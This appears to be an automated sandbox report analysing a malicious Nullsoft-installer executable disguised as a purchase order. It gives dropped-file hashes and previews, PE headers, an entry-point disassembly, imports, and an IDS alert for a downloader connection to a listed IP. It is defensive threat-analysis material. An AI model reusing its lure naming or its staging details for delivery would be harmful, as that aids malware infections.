                                                                                                    SHA1:B9CFEF43585C8B26A5DAA2FE581859759A183C67
                                                                                                    SHA-256:3E1FC0E4A2EA442BF9F3DD4AE9444F8C595B9E7701DE2FD7ABCF7F7B29D9C683
                                                                                                    SHA-512:D125EDEA7D087009C00747B7C695A21F99B330DD5058FB0A2E3CD68EAFCACA63CAD591722DA6355A0FBC60D2E9710877BFAC713ECEEA64E7D9E6133599AFE884
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:[ExReBoot]..Acc=user32::EnumWindows(i r2 ,i 0)..
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x61f8d683, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17301504
                                                                                                    Entropy (8bit):1.0259151041230123
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:zvQZn7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqkof:lyUt3F0TkT0TAitKxK9JdMa4AgC
                                                                                                    MD5:38B6B4DFDE7989B957443BD490AEB116
                                                                                                    SHA1:5C19E066E9BE645C486977AF7BFB4E10163C7AD1
                                                                                                    SHA-256:1CFFF8589E376B0C28E9E28B90CDD63B95D5D5BB516B02A714018EB61CD21A31
                                                                                                    SHA-512:D0281044F12C6B7F35846DBD4DD6F168BD017F128DF75BEE08E19509AF2DFBB0F14CB141564D9E472FEE972B6F9069F9EFFC116FE569B1EBCB70F7DED1CD9692
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:a..... .......4.........gN;....{........................&....../...{...2...|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{...................................,.M.2...|.................._....2...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2
                                                                                                    Entropy (8bit):1.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:..
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1252070
                                                                                                    Entropy (8bit):3.9296044035967466
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:XP7hb1+gBbz+rhxKS7LWZSMRkx11lDHli5gDFhthZzDT/2d5+pQLVWzD:/d4qqr24IBAZzDT/lK6D
                                                                                                    MD5:F062244C2750C78C3FEB9CBE0C43842C
                                                                                                    SHA1:48403C4205FE5D3C45CFB1993A17E20128F0D458
                                                                                                    SHA-256:E67B56234F878BEFDC846063E3FD5D1A143CC28102D60B0CFECCFAB05A8A5323
                                                                                                    SHA-512:1AB3BC2DEBBFB95C46A82C011753A0189F652C4DDE624AE614CF087B123CF034B6E5483941B1C74DEAB9EF6A244369D87B7716BCF8BE5598EBD6DA5E432EBB6D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:........,...................T........... ...................................................................................................................................................................................................................................................G...Q...............j...........................................................................................................................................#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11776
                                                                                                    Entropy (8bit):5.656006343879828
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                                                                    MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                                                                    SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                                                                    SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                                                                    SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                                                                    • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                                                                    • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                                                                    • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                                                                    • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                                                                    • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                                                                    • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                                                                    • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                                                                                                    • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                                                                                                    • Filename: PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                    Category:dropped
                                                                                                    Size (bytes):676214
                                                                                                    Entropy (8bit):7.803571756354754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:ORqeNjN24O1o46FW+iLOWIRKiKuI+v8nbDVJNtjzFwZnayIjYa9iXb8TOM:Ejoo7W+1WU2Y0nPVJNJlTYXYiM
                                                                                                    MD5:5E1C814FC675448C381899D325ABA145
                                                                                                    SHA1:46A9E1B34F90D4BE128FC1B6F1D698D79C93297B
                                                                                                    SHA-256:BF065B1F51EB32228108A6508FF649143A97526A06B27FA6771A85246B162F84
                                                                                                    SHA-512:EA3BEFC73DB84C42834E59198F5DD416B738C33FD1105384FF87031205888A018DA7D124582D25ED8A8CEA8567EF07051D1EE6FA77FE4C4B74688BCAA1E88338
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 11%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@.......................................@..................................t...........T...........................................................................p...............................text....^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....T.......V...~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27
                                                                                                    Entropy (8bit):4.134336113194451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:iGAeSMn:lAeZ
                                                                                                    MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                                                                                    SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                                                                                    SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                                                                                    SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                                                                    Malicious:false
                                                                                                    Preview:[Access]..Setting=Enabled..
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:Apple DiskCopy 4.2 image , 589824 bytes, 0x1b00d600 tag size, GCR CLV ssdd (400k), 0x1 format
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146780
                                                                                                    Entropy (8bit):4.615458162169198
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:dUME4XTG9/8KSneZDa5+94h7hcR6q1QM8cULVTq/O3V+qNwjfhU2o:dRDXTMM2W5+9w7SnGteWHwdUv
                                                                                                    MD5:7A6837390B1EF89D7B9A5DF07DB64AC4
                                                                                                    SHA1:8250AAC9A92F26A4D9D3C433488EBD4A1BB8E57F
                                                                                                    SHA-256:5E6C4D3BC544D45AED600E922BA4AEAA6FD3EA88B80FAC69ABF5D1280D4990AB
                                                                                                    SHA-512:2598386410A3D159D2DC4E1AF1789E807FD7C56699BC00C91DBB8B774FCF193BDEF9C57E705AE2FBC2992C5614FBD7D2E916A1806E834998A85FB4061E58D36A
                                                                                                    Malicious:false
                                                                                                    Preview:...........kk..P.......~~~..w.........n...............8..................WWWW..................K............R.mm...uu........................===...====.......U..........:...].........CC...p.......ZZ....RRR.........-...........................W.aa...]......??.........C...MM....-.........gggg...........""...-.11..uu.N........J.....2....................................C..MM....{{...........n.......i.....KK.........................b......................`........*............ii.......J..........yyy......kkkk..Q.........................................OOO.......TT.www.......3...................E..._.HH......................99...............g.A............gg.....4.n............9...._.................++.TTTTT.~..............!.......].............PP..........&.......kk...~~~..............{{........33..............^..uu................''''...".^^..u.............................**......SSSSS..................uuu.?............GG..........................qq.*..........CC.........................oo
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):300355
                                                                                                    Entropy (8bit):7.4995353901755175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:db1+gBbz+rhxKt4vJRY9AWZLW8bRkx11lDHli51GrDFXxthZi:db1+gBbz+rhxKS7LWZSMRkx11lDHli5z
                                                                                                    MD5:93DE41A0E6EDC0B539E7E7E94D03D757
                                                                                                    SHA1:353EE65733321F8DBC41FF7354950ACF319E2753
                                                                                                    SHA-256:6E9AD72F1A8114704599F1DEFE38E18A2ADE105A005A49456DA71FB388FF7577
                                                                                                    SHA-512:0BA06C5872ADD52338F5ABB39601A90A79A1FCE07EE8B8E71733AAFA9C396DC0A6B2057DB81F3E936192A3053F908EC66069987B2B57B7A409F0D9283D89496E
                                                                                                    Malicious:false
                                                                                                    Preview:...::.i..........J...h.999.c...vv..........._............PP......tt...".....ssss........................#..............s.........................KK.............;...............f..####..0...H....................=....i..7.a...m..h..^^..V......s.JJJ..11....))).......................L.................................kkkk....bbb..T...............h.......".................t...........=.............\\............wwww.............'................88.............RR.%%...........................................}}}}}...........H...............................h.a.......................%.......tt.../.gg.}......[[..."................K.V.}.zzz.333..%%%.......................FF..........Z.............N...ggg........"......!...++...#.***.........))))))).....................:..FFF..V........d...oo.....................HHHH.....ddd..........................3.......9......N......9...............yyy.....-..........b..................qq...???....E....t.....QQ.......9..'..t........../.......................>.
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):234233
                                                                                                    Entropy (8bit):1.2610900601867552
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:5hBRH0NvoO/tUtNHcpmob8fw+bjubeCDu0EUAK5r/Zolpmo6quOGXBD3mBziYKkq:550NkHEmobD+2FALA064/m7h
                                                                                                    MD5:6660188AB1EA377E82BDD257689C526D
                                                                                                    SHA1:976D7478687D50AA64111522DFDED59C12E8CAA6
                                                                                                    SHA-256:D9BE1BBC1FA96E241CCA3A1AC05A0399577F0791B56C24430D5259B9144ACC7C
                                                                                                    SHA-512:2A67D6F53F0FC743872EB97ED7A3E9320369C3253413DE0AB7CD56B9EAF7653BE03C1E123C1A805D707CF1B55C6730EE09780215798B5F6E7FF0D722794087C3
                                                                                                    Malicious:false
                                                                                                    Preview:............................................7....FW..................................E.................................................]....................................E........T~.....................[................................................................................................................................................@................h............................................................E...................................Y.............................6................................................................................................1............9...............................................................c......................X........M.......#..................?......................................Q...&..................................u....x............................`............".....................................X...........j................H.....................S.....................................T.................7...
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):343449
                                                                                                    Entropy (8bit):1.2554189222827585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:PFQBtMFEp5oCGzvCJFJrv+H/krJpBi0m1PbtFXenyx66vr1zYCDMDWBWcjW+/TBa:GBwvCQkMrlrDs9ES6hOh
                                                                                                    MD5:96A8F104A3C5E3B0AEC79FC7430BECFE
                                                                                                    SHA1:7B178AC27BB5B0F4826C492DB3A9E3AF96F42C17
                                                                                                    SHA-256:3CD846840186FEECC625E3970560C5756BCD7B64686972762654C005DF9F4456
                                                                                                    SHA-512:63611074F88FDD11B998F1BE7F7F14A5BA8E6261D2323BC66547F23EB29311A9E725F380BC5A0333E3A5737F1BEB09691F314EDB5674A6CFFD924FDC6228D678
                                                                                                    Malicious:false
                                                                                                    Preview:..................................q....................g............%......................e............................"...f.........................................................!.....................................U.)..]...............-]............................X..................................................................................................................................................................S.......................................................................................................................................u................P...........................................=................................................................................/.................................................................................8......}.........d.3......................................b....rp..................$............................................s............................................................/......s......-..
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, progressive, precision 8, 2501x1667, components 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55850
                                                                                                    Entropy (8bit):7.417058492746941
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bMEcc6tobCtPo6vQvXu8AJAln7d1fvgHuGK81W9bXcUqIFQQ7l4nD9MYBnHa:IEcc6ptbvQvu67d1fiKCWd/FQQ7U9Tn6
                                                                                                    MD5:592A0CB66D2C141B51DEF6CA4A58BB97
                                                                                                    SHA1:1E1E3AB6A4334C3AE2FE88BFC38E4DB11CF8DD84
                                                                                                    SHA-256:0F2E46BAEDB6FD406BEA3989695015C6C1A6D38968541254D8FFAA672374EA0C
                                                                                                    SHA-512:6E4BDCA7CC9AF91DCE1F011D3B6E7321004E3B5D785534314890A90CACC347E83D13377BC327A52BD26ED8BB60DEFD5EE3CD2ADAAA6A86FEFE8F0699C8A5DF0B
                                                                                                    Malicious:false
                                                                                                    Preview:......JFIF.............C.........................................................................................................................0......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:GTA audio index data (SDT)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):152193
                                                                                                    Entropy (8bit):1.261317213675428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:KK+LJq+PH3HUdZe54Qb1w5RypJZltevJwQ5SuPWsj4GC3mukewFhVl8l6G7jddq4:TvAb3OqT5r
                                                                                                    MD5:97BE27644CEA82513B31E823BA8BFE6A
                                                                                                    SHA1:DE25AD32369F214AA6AC8F2FA34E577BC5D4E282
                                                                                                    SHA-256:BE77A08B612586789B015D3C2D463D71EA2A9CDCB3255CCF8A4F7456BEDF9917
                                                                                                    SHA-512:F2A53862BD0AFD9DAFB653D8BA703FFB3C94FF6C98F5C8A19C3F55444BA23AD7854A8307AAEE41CAB23C3CCDD4B7C6145070C57D9AED9D43AFEB467E5247E3AF
                                                                                                    Malicious:false
                                                                                                    Preview:......................................]..............................................................................................................................................................................O.....a.......T.....................................................}................y.........../.........t......~..#.........m........................).........F....... .....................................y.....................:.............................................1...............7.P....e...............f...............1.................................................>......r....R......................................G............n....................................................k...............&.........................................................6....................N.(.............e.../.................l.................................................r................V...........T...................................N..............................m........
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                    Entropy (8bit):7.803571756354754
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:Purchase-Order27112024.scr.exe
                                                                                                    File size:676'214 bytes
                                                                                                    MD5:5e1c814fc675448c381899d325aba145
                                                                                                    SHA1:46a9e1b34f90d4be128fc1b6f1d698d79c93297b
                                                                                                    SHA256:bf065b1f51eb32228108a6508ff649143a97526a06b27fa6771a85246b162f84
                                                                                                    SHA512:ea3befc73db84c42834e59198f5dd416b738c33fd1105384ff87031205888a018da7d124582d25ed8a8cea8567ef07051d1ee6fa77fe4c4b74688bcaa1e88338
                                                                                                    SSDEEP:12288:ORqeNjN24O1o46FW+iLOWIRKiKuI+v8nbDVJNtjzFwZnayIjYa9iXb8TOM:Ejoo7W+1WU2Y0nPVJNJlTYXYiM
                                                                                                    TLSH:99E402A2796182C6C9EB4EF05F62DB7072BDB8AC85C0130F73F76618966239314A915F
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@
                                                                                                    Icon Hash:25eee66466b2bd17
                                                                                                    Entrypoint:0x40335a
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                    Instruction
                                                                                                    sub esp, 000002D8h
                                                                                                    push ebx
                                                                                                    push ebp
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    push 00000020h
                                                                                                    xor ebp, ebp
                                                                                                    pop esi
                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                    mov dword ptr [esp+10h], 00409230h
                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                    call dword ptr [00407034h]
                                                                                                    push 00008001h
                                                                                                    call dword ptr [004070BCh]
                                                                                                    push ebp
                                                                                                    call dword ptr [004072ACh]
                                                                                                    push 00000009h
                                                                                                    mov dword ptr [004292B8h], eax
                                                                                                    call 00007F8A8D117BCAh
                                                                                                    mov dword ptr [00429204h], eax
                                                                                                    push ebp
                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                    push 000002B4h
                                                                                                    push eax
                                                                                                    push ebp
                                                                                                    push 004206A8h
                                                                                                    call dword ptr [0040717Ch]
                                                                                                    push 0040937Ch
                                                                                                    push 00428200h
                                                                                                    call 00007F8A8D117835h
                                                                                                    call dword ptr [00407134h]
                                                                                                    mov ebx, 00434000h
                                                                                                    push eax
                                                                                                    push ebx
                                                                                                    call 00007F8A8D117823h
                                                                                                    push ebp
                                                                                                    call dword ptr [0040710Ch]
                                                                                                    push 00000022h
                                                                                                    mov dword ptr [00429200h], eax
                                                                                                    pop edi
                                                                                                    mov eax, ebx
                                                                                                    cmp word ptr [00434000h], di
                                                                                                    jne 00007F8A8D114CB9h
                                                                                                    mov esi, edi
                                                                                                    mov eax, 00434002h
                                                                                                    push esi
                                                                                                    push eax
                                                                                                    call 00007F8A8D117273h
                                                                                                    push eax
                                                                                                    call dword ptr [00407240h]
                                                                                                    mov ecx, eax
                                                                                                    mov dword ptr [esp+1Ch], ecx
                                                                                                    jmp 00007F8A8D114DABh
                                                                                                    push 00000020h
                                                                                                    pop edx
                                                                                                    cmp ax, dx
                                                                                                    jne 00007F8A8D114CB9h
                                                                                                    inc ecx
                                                                                                    inc ecx
                                                                                                    cmp word ptr [ecx], dx
                                                                                                    Programming Language:
                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x254e0.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x5ec60x600060ec0c4d80dd6821cdaced6135eddfd5False0.6593424479166666data6.438901783265187IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x90000x202f80x60099cdd6cde9adee6bf3b24ee817b4574bFalse0.4830729166666667data3.8340327961758165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x4a0000x254e00x256003a1bbeac9e2615962dd6892f6486190bFalse0.6265677257525084data6.670974331190769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0x4a3b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.33201230332426357
                                                                                                    RT_ICON0x5abe00xe47bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9978287257868732
                                                                                                    RT_ICON0x690600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.500207468879668
                                                                                                    RT_ICON0x6b6080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5823170731707317
                                                                                                    RT_ICON0x6c6b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.6337953091684435
                                                                                                    RT_ICON0x6d5580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.7590252707581228
                                                                                                    RT_ICON0x6de000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.7239884393063584
                                                                                                    RT_ICON0x6e3680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7606382978723404
                                                                                                    RT_ICON0x6e7d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.5309139784946236
                                                                                                    RT_ICON0x6eab80x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.5878378378378378
                                                                                                    RT_DIALOG0x6ebe00x100dataEnglishUnited States0.5234375
                                                                                                    RT_DIALOG0x6ece00x11cdataEnglishUnited States0.6056338028169014
                                                                                                    RT_DIALOG0x6ee000xc4dataEnglishUnited States0.5918367346938775
                                                                                                    RT_DIALOG0x6eec80x60dataEnglishUnited States0.7291666666666666
                                                                                                    RT_GROUP_ICON0x6ef280x92dataEnglishUnited States0.6575342465753424
                                                                                                    RT_VERSION0x6efc00x214dataEnglishUnited States0.5338345864661654
                                                                                                    RT_MANIFEST0x6f1d80x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                    DLLImport
                                                                                                    KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                    ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                    ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-11-27T16:50:31.292241+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649755164.160.91.32443TCP
